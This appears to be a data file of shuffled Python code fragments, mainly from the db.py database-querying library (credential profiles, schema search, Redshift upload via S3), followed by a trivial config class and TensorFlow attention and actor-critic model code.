"dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username", "AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is", "Title ArtistId 0 1 For Those About To Rock We Salute You 1", "as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\"", "the function will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str", "DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT,", "self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self,", "5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\",", "template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in data]", "port: int Port the database is running on. defaults to default port for", "GenreId | INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice", "You) 1 1 1 2 Balls to the Wall 2 2 2 3", "rendering of PrettyTable a bit. None means that you'll have verrrrrrrry wide columns", "AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either", "# returns all columns containing Address +----------+----------------+--------------+ | Table | Column Name |", "None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value", "include \"system\" tables (the ones that the database needs in order to operate).", "search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your", "self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def", "return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__()", "making doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table", "AlbumId Title ArtistId 0 1 For Those About To Rock We Salute You", "not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def", "by the DB.query method. You can override it by adding limit={X} to the", "str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value in", "# returns all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+", "False try: import pyodbc as pyo HAS_ODBC = True except ImportError: try: import", "None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename,", "Name of the database schemas: list List of schemas to include. Defaults to", "ones that the database needs in order to operate). This includes things like", "| +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist | ArtistId,", "name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value", "arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\"", "password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars =", "| | Track | MediaTypeId | INTEGER | | Track | Milliseconds |", "table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar,", "if boto is present, set the bucket_location to default. # we can't do", "GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1", "= ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ...", "... table_name ... ''' >>> data = [ ... {\"name\": \"Album\"}, ... {\"name\":", "sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql", "BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have", "\\\\\\r 0 1 For Those About To Rock (We Salute You) 1 1", "... ''' >>> data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ...", "elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or", "varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql)", "| Track | AlbumId | INTEGER | | Track | MediaTypeId | INTEGER", "db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and are NVARCHAR(70)S", "file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove profile", "exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the", "hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\",", "DataFrame chunks to upload and COPY from S3. Upload speed is *much* faster", "Wild 4 Restless and Wild 5 For Those About To Rock We Salute", "value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list)", "a Shark 3 2 3 4 Restless and Wild 3 2 4 5", "return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns,", "for your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f:", "Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit", "is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None:", "the Dawn 0.99 5 Put The Finger On You 0.99 6 Let's Get", "None: raise Exception(\"Database type not specified! Must select one of: postgres, sqlite, mysql,", "except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None,", "print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000,", "chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i +", "of DataFrame chunks to upload and COPY from S3. Upload speed is *much*", "in the foreign and reference keys. This is used to control the rendering", "= query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2", "self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password", "\"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if", "Loads crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name} and are", "HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or", "creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def", "= DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album", "self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column names self.cur.execute(\"drop", "schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified'", "alternative to using keys, you can use an S3 object print_sql: bool (False)", "| Artist | ArtistId | INTEGER | | Customer | SupportRepId | INTEGER", "Employee | Address | NVARCHAR(70) | | Genre | GenreId | INTEGER |", "q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q", "INTEGER | | Customer | CustomerId | INTEGER | | Employee | ReportsTo", "ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema,", "should match your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry,", "| MediaTypeId | INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+", "for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search,", "try: import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG = False", "for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta", "it one time, database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system',", "for exploring and querying a database. Parameters ---------- username: str Your username for", "your aws secrety key. if this is None, the function will try and", "# pull out column metadata for all tables as list of tuples if", "\"\"\" Aggresively search through your database's schema for a column. Parameters ----------- search:", "You 1 Balls to the Wall 2 Restless and Wild 3 Restless and", "in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is", "if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and then", "---------- >>> from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5", "None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3", "0 1 For Those About To Rock We Salute You 1 1 2", "{\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>> db.query(q, data=data) table_name cnt 0", "5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\":", "are varchars +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ |", "are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type |", "We Salute You 1 Balls to the Wall 2 Restless and Wild 3", "tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load directly", "you don't have to save them in script. Parameters ---------- profile: str (optional)", "s3. Parameters ---------- name: str name for your shiny new table df: DataFrame", "UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId", "S3Connection from boto.s3.key import Key from boto.s3.connection import Location # if boto is", "database with a raw string. Parameters ---------- q: str Query string to execute", "None, the function will try and grab AWS_SECRET_KEY from your environment variables s3:", "= self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema #", "search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type:", "bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're", "tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables)", "column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name,", "returns all columns containing Address that are varchars +----------+----------------+--------------+ | Table | Column", "query the system tables. limit: int, None Default number of records to return", "self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache", "elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for", "DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f,", "cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite", "INTEGER | | Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId", "limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]:", "= \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query) else: return", "continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for", "import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db", "Aggresively search through your database's schema for a table. Parameters ----------- search: str", "Playlist | Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200) |", "sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list():", "# generate our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con,", "db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\",", "''' >>> data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\":", "SQLite format. need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\")", "mssql else: if limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit,", "some way for all those doctests to be viable... -= if not, there's", "creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit')", "Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER |", "and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to using keys,", "feature only available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import", "db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from", "row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables: for", "= unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item", "1 6 7 Let's Get It Up 1 1 7 8 Inject The", "import defaultdict import pandas as pd import pybars from .column import Column, ColumnSet", "INTEGER | | MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId", "| | InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId |", ") or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con", "= filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit =", "query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with a raw string.", "table name in dict for (table_schema, table_name, column_name, data_type) in cols: if table_name", "= StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i", ">>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+", "from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY)", "self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if", "table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find", "| Table | Column Name | Type | +-----------+-------------+---------------+ | Artist | Name", "\"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"):", "data=None, union=True, limit=None): \"\"\" Query your database from a file. Parameters ---------- filename:", "driver: str, None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\",", "1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1", "raise Exception(\"Profile '{0}' does not exist. Could not find file {1}\".format(name, f)) os.remove(f)", "HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite", "NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\"", "in dict for (table_schema, table_name, column_name, data_type) in cols: if table_name not in", "= self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache =", "for the database password: str Your password for the database hostname: str Hostname", "def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't have to", "and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col))", "sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row))", "5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password':", "q, data=None, union=True, limit=None): \"\"\" Query your database with a raw string. Parameters", "\"\"\"A lazy loaded reference to the table metadata for the DB.\"\"\" if len(self._tables)", "not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\") self.con", "in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table,", "Walks 0.99 >>> template = ''' ... SELECT ... '{{ name }}' as", "0 For Those About To Rock (We Salute You) 0.99 1 Balls to", "HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except", "if necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise", "tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys", "chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for", "that there will be no limit (That's right, you'll be limitless. Bradley Cooper", "as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None,", "remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance", "and then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using", "where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1],", "a db admin you might actually want to query the system tables. limit:", "from .query_templates import query_templates # attempt to import the relevant database libraries #", "password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db", "self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not", "the foreign/ref key query by doing it one time, database-wide, if query is", "TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG = True except", "((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or", "from s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}'", "tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in", "= [] for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search):", "schema. This will take a second...\") rows_to_insert = [] tables = [row[0] for", "| ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables", "search): \"\"\" Aggresively search through your database's schema for a table. Parameters -----------", "| Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | |", "don't have to save them in script. Parameters ---------- profile: str (optional) identifier/name", "bool Whether or not \"UNION ALL\" handlebars templates. This will return any handlebars", "Pulls your database's schema again and looks for any new tables and columns.", "{u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username':", "that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\"", "= '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with", "| AlbumId, Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>>", "profile. Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file.", "we'll create the table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\",", "the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return", "DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port}", "config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name)", "On You 0.99 6 Let's Get It Up 0.99 7 Inject The Venom", "dict Optional argument for handlebars-queries. Data will be passed to the template and", "S3 alternative to using keys, you can use an S3 object print_sql: bool", "list, dict Optional argument for handlebars-queries. Data will be passed to the template", "DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and", "| +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre | Name", "naive approach if use_cache: # generate our Tables, and load them into a", "if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID", "= self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname", "S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f)", "cached metadata. Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] =", "only if necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError:", "to include. Defaults to all. profile: str Preconfigured database credentials / profile for", "| +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols = [] for", "table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k in", "Save your database credentials so you don't have to save them in script.", "variables AWS_SECRET_KEY: str your aws secrety key. if this is None, the function", "FROM ... Album a ... INNER JOIN ... Track t ... on a.AlbumId", "try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or", "= S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets can use", "<NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME>", "to amazon, this is # much faster when it comes time to run", "pattern for what you're looking for data_type: str, list (optional) specify which data", "... {{ name }} ... GROUP BY ... table_name ... ''' >>> data", "\\COPY here. the s3 argument is a prefix, so it'll pick up #", "or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+ |", "or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL:", "will take a second...\") rows_to_insert = [] tables = [row[0] for row in", "self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and", "schemas self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is" ]
[ "<reponame>LucasLaibly/Intrusion class Development(object): DEBUG: True class Testing(object): DEBUG: False class Production(object): DEBUG: False" ]
[]
[ "hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer", "self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2", "embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i", "= self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x", "# (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128,", "residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate)", "x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output,", "v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len,", "tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q,", "is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))", "self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size,", "rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 =", "scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add", "self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads == 0", "call(self, x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z =", "as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) #", "= embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x,", "padding so outputs have the same shape as inputs. padding='same') self.activation_layer = Activation('relu')", "self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output,", "class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs):", "Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class", "= Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x)", "z): # Critic value = self.critic(x, z) # Actor actor_output = self.actor(x, z)", "block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1", "= Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual =", "last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1", "ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units =", "Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np", "v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads,", "embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5,", "= [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def", "Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\"", "self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value = self.critic(x, z)", "self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D(", "= actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic", "num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\",", "np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (...,", "num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic,", "[x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x", "tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout,", "= tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x)", "= self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output)", "depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2,", "mask to the scaled tensor. if mask is not None: scaled_attention_logits += (mask", "num_heads): 